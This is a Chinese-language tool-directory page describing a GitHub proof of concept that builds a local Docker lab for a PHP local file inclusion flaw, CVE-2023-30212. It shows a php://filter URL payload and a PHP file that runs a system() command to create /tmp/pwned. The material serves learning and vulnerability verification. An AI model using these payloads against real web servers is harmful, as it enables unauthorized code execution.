Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2023-30212 — 使用 Docker 的 CVE-2023-30212 PoC | Kitploit
工具/GitHubGitHub/sungmin20/cve-2023-30212
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubsungmin20/cve-2023-30212

cve-2023-30212

使用 Docker 的 CVE-2023-30212 PoC

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2023-30212

使用 Docker 的 CVE-2023-30212 PoC

CVE-2023-30212 环境搭建及 PoC 报告

📌 概述

本报告针对 Vulhub 中未收录的 CVE-2023-30212 漏洞,自行搭建基于 Docker 的易受攻击的 Web 环境,并通过 PoC 验证该漏洞。

  • CVE 编号: CVE-2023-30212
  • 漏洞描述: 存在通过 PHP LFI(Local File Inclusion) 实现远程代码执行的可能性
  • 难度: 高级 (搭建 Vulhub 中不存在的环境)

🔧 环境搭建

1. Dockerfile 与 docker-compose 配置

  • 基础镜像: php:8.1-apache
  • 将 vulnerable.php 和 malicious.php 复制到 /var/www/html 目录
  • 可通过 8088 端口从外部访问 Docker构建

2. 主要文件说明

文件名说明
vulnerable.php存在 LFI 漏洞的 PHP 文件
malicious.php执行系统命令的恶意 PHP 文件
docker-compose.yml
图片 图片 图片 图片 ---

🚀 漏洞利用流程 (PoC)

1. 启动容器

root@kitploit:~
docker-compose up -d

容器名称: cve-2023-30212-cve-lfi-1

Apache 服务器启动后,可通过 http://localhost:8088 访问

  1. 查看 LFI 恶意文件源码 调用以下 URL,以 base64 编码形式查看 malicious.php 的内容:
root@kitploit:~
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
base64

将输出结果解码后,可确认以下 PHP 代码:

root@kitploit:~
<?php system("touch /tmp/pwned"); ?>
图片
  1. 执行命令并检查结果 调用以下 URL,实际执行命令:
root@kitploit:~
http://localhost:8088/malicious.php

命令执行后,应生成 /tmp/pwned 文件。

root@kitploit:~
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp

如果结果中存在 pwned 文件,则表示成功。

pwned文件

结果摘要

通过基于 php://filter 的 LFI 漏洞,成功查看并解码恶意文件内容

通过调用包含 system() 函数的恶意 PHP,成功执行任意命令

已生成 /tmp/pwned 文件,PoC 验证完成

下载工具
容器编排的配置文件
Dockerfile用于构建 Docker 镜像的配置文件